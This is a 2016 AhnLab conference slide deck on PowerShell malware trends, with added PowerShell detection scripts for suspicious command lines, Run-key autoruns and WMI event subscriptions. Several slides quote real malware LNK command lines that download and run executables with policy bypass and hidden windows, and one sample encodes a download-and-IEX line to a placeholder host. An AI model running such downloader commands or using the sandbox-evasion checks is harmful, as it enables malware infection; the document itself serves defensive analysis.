PowerMalware ?!
2016.11.18 – public edition
AhnLab Security Emergency response Center (ASEC), Analysis Team
Cha Minseok (車珉錫, CHA Minseok, Jacky Cha, mstoned7), Senior Researcher
Malware and techniques that use PowerShell
© AhnLab, Inc. All rights reserved. 2
:~$whoami
Profile
− Cha Minseok (車珉錫, CHA Minseok, Jacky Cha, mstoned7)
− 7 January 1988: started computing on an Apple ][+ clone
− 1989: infected by a variant of the Brain virus
− 1997: joined AhnLab
− Senior Researcher at AhnLab (Senior Malware Researcher)
− Analyzes and researches malware in the ASEC Analysis Team
− Member of the public-private joint investigation team and the cyber security expert group
− Member of vforum, AVED and AMTSO
− WildList Reporter
:~$whoami
• Books
- 보안에 미쳐라 (Be Crazy About Security, 2016)
* Source: http://www.yes24.com/24/goods/29333992
Before we start
• No system in this world is perfectly secure
- WarGames (1983), starring Matthew Broderick
* Source: WarGames (1983)
Wrap up
• Malware using PowerShell is increasing
- Tracks the market share of Windows 7 and Windows 10
- Usually used as a ransomware downloader
- Now also observed in targeted attacks
• Use of WMI
- Makes fileless malware possible
• Outlook
- PowerShell malware expected to grow alongside JS and VBS malware
- Possibility of multi-platform malware
Contents
01 PowerShell
02 Malware using PowerShell
03 Technique
04 File types
05 Fileless technique
06 Case study
07 Conclusion
01
PowerShell
PowerShell
• PowerShell
- Scripting language and shell released in 2006
- Available as an optional install for Windows Vista; built into Windows from Windows 7 onward
* Source: https://msdn.microsoft.com/en-us/powershell
Windows Management Instrumentation (WMI)
• WMI
* Source: https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
Windows Management Instrumentation (WMI)
• WMI architecture
* Source: http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
PowerShell + WMI
• Getting information about the installed antivirus products
- Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
PowerShell + WMI
• Checking for a virtual environment
- Get-WmiObject -Class Win32_ComputerSystem
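The two queries on these slides, wired into functions that interpret the result the way a reconnaissance stage (or an inventory script) would. This is an added example, not code from the deck. Two assumptions: the decoding of productState is the widely used community interpretation (Microsoft does not document the field), and the hypervisor vendor strings are illustrative rather than exhaustive.

```powershell
# Added example (not from the deck): interpret the AntiVirusProduct and Win32_ComputerSystem
# queries shown on the slides. productState decoding and the vendor list are assumptions.

function Get-AntiVirusState {
    # root\SecurityCenter2 is populated by Windows Security Center on client editions only;
    # on a server the query returns nothing, which is itself a useful signal.
    $products = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ErrorAction SilentlyContinue
    foreach ($p in $products) {
        # productState is a packed integer; read it as six hex digits. Digits 3-4 describe
        # real-time protection (10 or 11 = on), digits 5-6 the signatures (00 = current).
        # This is the common community interpretation, not a documented format.
        $hex = [Convert]::ToString([int]$p.productState, 16).PadLeft(6, '0')
        [pscustomobject]@{
            Name     = $p.displayName
            Enabled  = @('10', '11') -contains $hex.Substring(2, 2)
            UpToDate = $hex.Substring(4, 2) -eq '00'
            ExePath  = $p.pathToSignedProductExe
        }
    }
}

function Test-VirtualMachine {
    param([string]$Manufacturer, [string]$Model)
    # SMBIOS strings that common hypervisors expose through Win32_ComputerSystem (illustrative list).
    $vendorPatterns = 'VMware', 'VirtualBox', 'innotek', 'QEMU', 'Xen', 'Parallels', 'Bochs'
    if ($Manufacturer -eq 'Microsoft Corporation' -and $Model -like '*Virtual Machine*') { return $true }
    foreach ($pattern in $vendorPatterns) {
        if ("$Manufacturer $Model" -match $pattern) { return $true }
    }
    return $false
}

function Get-VirtualizationStatus {
    $cs = Get-WmiObject -Class Win32_ComputerSystem
    [pscustomobject]@{
        Manufacturer      = $cs.Manufacturer
        Model             = $cs.Model
        # HypervisorPresent exists from Windows 8 / Server 2012; it is also true on a Hyper-V
        # host, so it only corroborates. On Windows 7 the property is absent and coerces to $false.
        HypervisorPresent = [bool]$cs.HypervisorPresent
        IsVirtual         = Test-VirtualMachine -Manufacturer $cs.Manufacturer -Model $cs.Model
    }
}

# Self-check on constructed values (the strings VirtualBox reports by default, and a laptop).
if (-not (Test-VirtualMachine -Manufacturer 'innotek GmbH' -Model 'VirtualBox')) { throw 'VM check failed' }
if (Test-VirtualMachine -Manufacturer 'Dell Inc.' -Model 'Latitude 7480') { throw 'false positive on physical host' }

Get-AntiVirusState | Format-Table -AutoSize
Get-VirtualizationStatus | Format-List
```

Malware runs exactly these checks to decide whether to stay dormant (sandbox) or which product it has to evade; a defender can run the same functions from a logon script to catch hosts whose antivirus reports Enabled = False or UpToDate = False.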
02
Malware using PowerShell
Timeline
(Figure: milestones from 1993 to 2017; years marked 1993, 1998, 2000, 2004, 2006, 2007, 2013, 2014, 2015, 2016, 2017. Milestones shown, with the years the following slides confirm:)
- Enhanced batch viruses; macro viruses; VBScript malware
- 2000: Loveletter
- 2004: Monad announced
- 2006: PowerShell released; PowerShell malware PoC
- 2013: PowerShell ransomware
- 2014: Poweliks; Phase
- 2015: fileless intrusions using WMI
- 2016: PowerShell + macro; flood of PowerShell downloaders
- Also shown: Kovter, Bedep
1995 – Macro virus
• 1995–2001: heyday of the macro virus
2000 - Loveletter
• 4 May 2000: LoveLetter virus
- Spread by e-mail
- Social engineering: mail subject "ILOVEYOU"
- Destroyed image and music files
2004 – Monad
• Concerns
- Monad (the PowerShell prototype) developed in 2004
* Source: https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
2006 - PowerShell malware PoC
• PowerShell proof-of-concept malware
* Source: https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
2006 - PowerShell released
• PowerShell released
* Source: http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
2013 – PowerShell ransomware
• PowerShell ransomware appears
* Source: https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
2014 - Poweliks
• Poweliks
- Stored in the registry
* Source: http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
2014 - Phase
• Phase
- A variant of Solarbot (first seen in 2013)
* Source: http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
2015 – WMI abuse
• Black Hat 2015
* Source: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
2015 - PowerShell malware starts to increase
• Increase in PowerShell malware
* Source: https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
2016 - Macro + PowerShell
• Macro + PowerShell
* Source: http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
2016 - Malware using PowerShell becomes widespread
• Malware using PowerShell becomes widespread
* Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
03
Technique
Conditions for in-the-wild malware
• A large user base
• Gaps in the security posture
• Easy to create
Advantages of PowerShell malware
• Powerful functionality
• Easy to create
• Potential to evade behaviour-based products
Main infection vectors
• Mail
− Attachment or link
• Web browser
− Exploit kits
− Also used for fileless infections
Infection vector
• Mail
Running PowerShell
• Execution permissions
- Tested the DownloadFile call both as a single command line and as a script
- The single command runs, but the script is blocked by the execution policy: the policy only governs script files (.ps1), not commands passed on the command line
Running PowerShell
• Bypassing the PowerShell execution policy
* Source: https://technet.microsoft.com/en-us/library/ee176847.aspx
Running PowerShell
• Bypassing the PowerShell execution policy
* Source: http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
Functionality
• Downloader or dropper
* Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
04
File types
Types
• Office (DOC, DOCM, XLS, XLSM)
• Shortcut (LNK)
• PowerShell (PS1)
• Windows Script File (WSF), HTML Application (HTA)
• JavaScript / Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
JavaScript - JS
• JavaScript (JS)
Visual Basic Script
• Visual Basic Script (VBS)
Windows Script File (WSF)
• WSF (Windows Script File)
- Mostly JavaScript
HTML Application (HTA)
• HTML Application (HTA)
- Mostly JavaScript
Office (DOC, DOCM, XLS, XLSM)
• Documents containing macros
Shortcut (LNK)
• LNK
Shortcut (LNK)
• Download
- %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
- The file name and the Start-Process call are assembled from string fragments so that simple string matching on the LNK target fails
Shortcut (LNK)
• Download
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
- -ExecutionPolicy bypass lifts the policy for this process only, -noprofile skips the user's profile scripts, and -windowstyle hidden keeps the console window from appearing
Shortcut (LNK)
• Encoding
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand UABvAHc………
- -EncodedCommand takes the script as base64-encoded UTF-16LE text, so the script never appears in clear text on the command line
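The execution-policy slides and the three LNK command lines above share one set of launch indicators: a per-process policy bypass, a hidden window, no profile, an encoded payload, a WebClient download, and string fragments glued together. The function below pulls those indicators out of a powershell.exe command line and decodes an -EncodedCommand payload so the body can be inspected as well. It is an added example, not code from the deck: samples 1 and 2 are the (redacted) command lines from the two download slides, and sample 3 is constructed here with a placeholder URL. The abbreviated switch forms it recognises (-e/-ec/-enc, -ex, -w, -nop, -noni) are the ones powershell.exe accepts.

```powershell
# Added example (not from the deck): extract launch indicators from a powershell.exe command
# line and decode -EncodedCommand payloads. Sample 3 and its URL are constructed.

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory = $true)][string]$Base64)
    # -EncodedCommand carries the script as base64 over UTF-16LE text.
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

function Get-PowerShellLaunchIndicators {
    param([Parameter(Mandatory = $true)][string]$CommandLine)
    $found = New-Object System.Collections.Generic.List[string]
    $body  = $CommandLine

    # powershell.exe accepts -e, -ec, -enc ... -EncodedCommand; "-ex..." is ExecutionPolicy, not matched here.
    $enc = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)')
    $decoded = $null
    if ($enc.Success) {
        $found.Add('EncodedCommand')
        try   { $decoded = ConvertFrom-EncodedCommand -Base64 $enc.Groups[1].Value; $body = $decoded }
        catch { $found.Add('EncodedCommand:undecodable') }
    }

    # Launcher switches live on the outer command line (abbreviations: -ex, -w, -nop, -noni).
    $switchChecks = @{
        'ExecutionPolicyBypass' = '(?i)-ex[a-z]*\s+(bypass|unrestricted)'
        'HiddenWindow'          = '(?i)-w[a-z]*\s+hidden'
        'NoProfile'             = '(?i)-nop[a-z]*'
        'NonInteractive'        = '(?i)-noni[a-z]*'
    }
    # Behaviour lives in the script body (the decoded text, if the command was encoded).
    $bodyChecks = @{
        'Downloader'       = '(?i)DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|BitsTransfer'
        'InvokeExpression' = '(?i)\biex\b|Invoke-Expression'
        'LaunchesProcess'  = '(?i)Start-Process|cmd(\.exe)?\s*/c|&\s*\(\$'
        'SplitStrings'     = "'\s*\+\s*'"
        'DropsToUserDir'   = '(?i)%TEMP%|%APPDATA%|\$env:temp|\$env:appdata'
        'Base64Decode'     = '(?i)FromBase64String'
    }
    foreach ($k in $switchChecks.Keys) { if ($CommandLine -match $switchChecks[$k]) { $found.Add($k) } }
    foreach ($k in $bodyChecks.Keys)   { if ($body -match $bodyChecks[$k])          { $found.Add($k) } }

    [pscustomobject]@{
        Score       = $found.Count
        Indicators  = @($found | Sort-Object -Unique)
        DecodedBody = $decoded
        CommandLine = $CommandLine
    }
}

# Sample 1 and 2: the redacted LNK targets from the slides.
$slide45 = @'
%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
'@
$slide46 = @'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
'@
# Sample 3 (constructed): the same download-and-run pattern hidden behind -EncodedCommand.
$payload     = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
$b64         = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$constructed = "powershell.exe -NoP -NonI -W Hidden -Enc $b64"

# Self-check: the encoded sample must decode and expose the indicators it hides.
$r = Get-PowerShellLaunchIndicators -CommandLine $constructed
foreach ($must in 'EncodedCommand', 'HiddenWindow', 'NoProfile', 'Downloader', 'InvokeExpression') {
    if ($r.Indicators -notcontains $must) { throw "self-check failed: $must" }
}
if ($r.DecodedBody -ne $payload) { throw 'self-check failed: decode mismatch' }

$slide45, $slide46, $constructed |
    ForEach-Object { Get-PowerShellLaunchIndicators -CommandLine $_ } |
    Format-List Score, Indicators, DecodedBody
```

The same function applies to process-creation telemetry (Sysmon event 1, Windows event 4688 with command-line auditing) and to the target stored in an LNK file; the decoded body is what a triage analyst actually needs to read, and the policy-bypass switch on the outer command line is a reminder that the execution policy is a safety catch for administrators, not a security boundary.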
PowerShell (PS1)
• PowerShell
05
Fileless technique
Fileless
• FilelessTechnique으로이용
-Poweliks
* Source:https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
Fileless malware
• Kovter
- The Run entry cannot be read by Regedit
Fileless malware
• Kovter
- Runs its script through mshta.exe
Fileless malware
• Kovter
- Encoded data
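The three Kovter slides and the Poweliks slide describe the same registry footprint: a Run value whose name Regedit cannot display, a value that launches mshta.exe (or a script: URI) instead of a file on disk, and a long encoded blob. The script below triages the Run keys for exactly those traits. It is an added example, not code from the deck; the patterns and the 200-character blob threshold are this example's own heuristics, and the two entries it checks itself against are constructed (the blob is generated locally, not taken from malware).

```powershell
# Added example (not from the deck): triage Run-key autoruns for the Poweliks/Kovter traits.
# Heuristics and thresholds are assumptions; the sample entries are constructed.

function Test-AutorunValue {
    param([string]$Name, [string]$Data)
    $reasons = New-Object System.Collections.Generic.List[string]
    # A value name that starts with a control character cannot be displayed by Regedit.
    if ($Name -match '[\x00-\x1F]')                              { $reasons.Add('unreadable value name') }
    if ($Data -match '(?i)\bmshta(\.exe)?\b')                     { $reasons.Add('mshta.exe launcher') }
    if ($Data -match '(?i)\b(javascript|vbscript):')               { $reasons.Add('script: URI') }
    if ($Data -match '(?i)rundll32.*mshtml.*RunHTMLApplication')   { $reasons.Add('rundll32 mshtml trick') }
    if ($Data -match '(?i)powershell.*(-e\b|-enc|-encodedcommand|hidden|bypass|\biex\b|FromBase64String)') {
        $reasons.Add('powershell launcher')
    }
    if ($Data -match '(?i)\b(wscript|cscript)(\.exe)?\b')          { $reasons.Add('script host launcher') }
    if ($Data -match '[A-Za-z0-9+/=]{200,}')                       { $reasons.Add('long base64-like blob') }
    return $reasons.ToArray()
}

function Get-SuspiciousAutoruns {
    $roots = @{
        HKCU = [Microsoft.Win32.Registry]::CurrentUser
        HKLM = [Microsoft.Win32.Registry]::LocalMachine
    }
    $subkeys = 'Software\Microsoft\Windows\CurrentVersion\Run',
               'Software\Microsoft\Windows\CurrentVersion\RunOnce',
               'Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($root in $roots.GetEnumerator()) {
        foreach ($sub in $subkeys) {
            $key = $root.Value.OpenSubKey($sub)
            if ($null -eq $key) { continue }
            # RegistryKey.GetValueNames() hands back the raw names, control characters included.
            foreach ($name in $key.GetValueNames()) {
                $data    = [string]$key.GetValue($name, '', 'DoNotExpandEnvironmentNames')
                $reasons = @(Test-AutorunValue -Name $name -Data $data)
                if ($reasons.Count -eq 0) { continue }
                $preview = if ($data.Length -gt 120) { $data.Substring(0, 120) + '...' } else { $data }
                [pscustomobject]@{
                    Key     = "$($root.Key)\$sub"
                    Name    = ($name -replace '[\x00-\x1F]', '<ctrl>')
                    Reasons = ($reasons -join '; ')
                    Data    = $preview
                }
            }
            $key.Close()
        }
    }
}

# Self-check on constructed entries: a normal autorun and a Kovter-like one
# (leading NUL in the name, mshta launcher, javascript: URI, 240-character blob).
$blob       = [Convert]::ToBase64String([byte[]](1..180))
$benign     = @(Test-AutorunValue -Name 'OneDrive' -Data '"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background')
$kovterLike = @(Test-AutorunValue -Name "`0a1b2" -Data ('mshta "javascript:' + $blob + '"'))
if ($benign.Count -ne 0)     { throw 'self-check failed: benign entry flagged' }
if ($kovterLike.Count -lt 3) { throw 'self-check failed: Kovter-like entry not flagged' }

Get-SuspiciousAutoruns | Format-List
```

The hit list is a starting point, not a verdict: the blob behind an mshta or powershell launcher still has to be decoded (the -EncodedCommand handling from the LNK section applies) to see what the second stage fetches, and the same checks belong on RunOnce, the Winlogon Shell/Userinit values and scheduled tasks, which this example leaves out.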
06
Case Study
07
Conclusion
Error
• Windows PowerShell has stopped working
- A Windows PowerShell error dialog may appear suddenly
Response
• WMI for Detection and Response
* Source: https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
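The WMI persistence from the Black Hat 2015 slide, and the detection angle this slide points at, come down to one structure: an __EventFilter (the trigger, a WQL query) bound to an __EventConsumer (the action) by a __FilterToConsumerBinding, all three living in the WMI repository rather than as files. The script below lists every such binding on a host and flags the ones whose consumer executes something. It is an added example, not code from the deck or from the ICS-CERT paper; which consumer classes count as suspicious, and the launcher patterns, are this example's own heuristics.

```powershell
# Added example (not from the deck or the ICS-CERT paper): enumerate WMI permanent event
# subscriptions in root\subscription and flag the ones that execute commands or scripts.
# The suspicion rules are this example's assumptions.

function Test-WmiSubscription {
    param([string]$FilterName, [string]$ConsumerClass, [string]$Action)
    # Windows ships one binding by default: "SCM Event Log Filter" -> NTEventLogEventConsumer.
    if ($FilterName -eq 'SCM Event Log Filter' -and $ConsumerClass -eq 'NTEventLogEventConsumer') { return $false }
    # Consumers that execute something are rare in legitimate use; log and mail consumers only record.
    if (@('CommandLineEventConsumer', 'ActiveScriptEventConsumer') -contains $ConsumerClass) { return $true }
    # Anything else is flagged only if its action text looks like a script launcher.
    return [bool]($Action -match '(?i)powershell|cmd(\.exe)?\s*/c|mshta|wscript|cscript|rundll32|regsvr32|FromBase64String|\biex\b')
}

function Get-WmiPersistence {
    param([string]$ComputerName = '.')
    $gwo = @{ ComputerName = $ComputerName; Namespace = 'root\subscription'; ErrorAction = 'SilentlyContinue' }
    $filters   = @(Get-WmiObject @gwo -Class __EventFilter)
    $consumers = @(Get-WmiObject @gwo -Class __EventConsumer)   # base class: returns every consumer type
    $bindings  = @(Get-WmiObject @gwo -Class __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # Filter and Consumer are object paths such as \\.\root\subscription:__EventFilter.Name="x"
        $filterName   = $b.Filter   -replace '^.*\.Name="([^"]*)".*$', '$1'
        $consumerName = $b.Consumer -replace '^.*\.Name="([^"]*)".*$', '$1'
        $f = $filters   | Where-Object { $_.Name -eq $filterName }   | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $consumerName } | Select-Object -First 1

        $query         = if ($f) { $f.Query } else { 'missing' }
        $consumerClass = if ($c) { $c.__CLASS } else { 'missing' }
        $action        = ''
        if ($c) {
            # CommandLineEventConsumer runs a command line; ActiveScriptEventConsumer runs embedded
            # VBScript/JScript (inline ScriptText or a ScriptFileName).
            if ($c.CommandLineTemplate) { $action = $c.CommandLineTemplate }
            elseif ($c.ScriptText)      { $action = $c.ScriptText }
            elseif ($c.ScriptFileName)  { $action = $c.ScriptFileName }
        }
        [pscustomobject]@{
            Filter        = $filterName
            Query         = $query
            Consumer      = $consumerName
            ConsumerClass = $consumerClass
            Action        = $action
            Suspicious    = Test-WmiSubscription -FilterName $filterName -ConsumerClass $consumerClass -Action $action
            Binding       = $b
        }
    }
}

# Self-check on constructed values: the default Windows binding is benign, a command consumer is not.
if (Test-WmiSubscription -FilterName 'SCM Event Log Filter' -ConsumerClass 'NTEventLogEventConsumer' -Action '') {
    throw 'self-check failed: default binding flagged'
}
if (-not (Test-WmiSubscription -FilterName 'Updater' -ConsumerClass 'CommandLineEventConsumer' -Action 'powershell -enc ...')) {
    throw 'self-check failed: command consumer not flagged'
}

Get-WmiPersistence | Where-Object { $_.Suspicious } | Format-List Filter, Query, ConsumerClass, Action
```

On a clean workstation the unfiltered list normally contains only the SCM Event Log binding; anything with a CommandLineEventConsumer or ActiveScriptEventConsumer deserves a look at the Query (what event fires it, such as a logon or a timer) and the Action. Removal means deleting the binding, the filter and the consumer, which Remove-WmiObject does on the objects this function returns, after the evidence has been exported.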
Outlook
• Expansion of PowerShell
- PowerShell open-sourced and released for Linux and macOS (August 2016)
* Source: https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
Outlook
• Replacing JS and VBS ?!
• Obfuscation
• Cross-platform
Wrap up
• Malware using PowerShell is increasing
- Tracks the market share of Windows 7 and Windows 10
- Usually used as a ransomware downloader
- Now also observed in targeted attacks
• Use of WMI
- Makes fileless malware possible
• Outlook
- PowerShell malware expected to grow alongside JS and VBS malware
- Possibility of multi-platform malware
Today's security problem
• Not really a fair fight
* Source: http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
Today's security problem
• Security is something everyone has to work on together
* Source: http://www.security-marathon.be/?p=1786
Q&A
email : minseok.cha@ahnlab.com / mstoned7@gmail.com
http://xcoolcat7.tistory.com
https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
References
• Ryan Kazanciyan & Matt Hastings, 'Investigating PowerShell Attacks', 2014
• Matt Graeber, 'Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor', 2015
• Santiago M. Pontiroli & F. Roberto Martinez, 'The Tao of .NET and PowerShell Malware Analysis', 2015
• 김승훈 (AhnLab), 'Macro Downloader Analysis', 2016
PowerShell Malware Trends, 2016-11-18, Cha Minseok, Digital Forensics Technical Lecture (public edition)
More Related Content

What's hot

CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
 

What's hot (20)

Next Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and DefenseNext Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and Defense
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
 
OSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adwareOSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adware
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Malware in the Wild: Evolving to Evade Detection
Malware in the Wild: Evolving to Evade DetectionMalware in the Wild: Evolving to Evade Detection
Malware in the Wild: Evolving to Evade Detection
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk   potentially malicious ur ls(130216) #fitalk   potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
 
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
 
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 -  N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 -  N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
 

Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usage
djenoalbania
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec Primer
ThreatReel Podcast
 
EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22
MichaelM85042
 
AppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 PrimerAppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 Primer
ThreatReel Podcast
 
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
MichaelM85042
 

Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판 (20)

[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
 
Computer security
Computer securityComputer security
Computer security
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
 
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0
 
Introduction to Exploitation
Introduction to ExploitationIntroduction to Exploitation
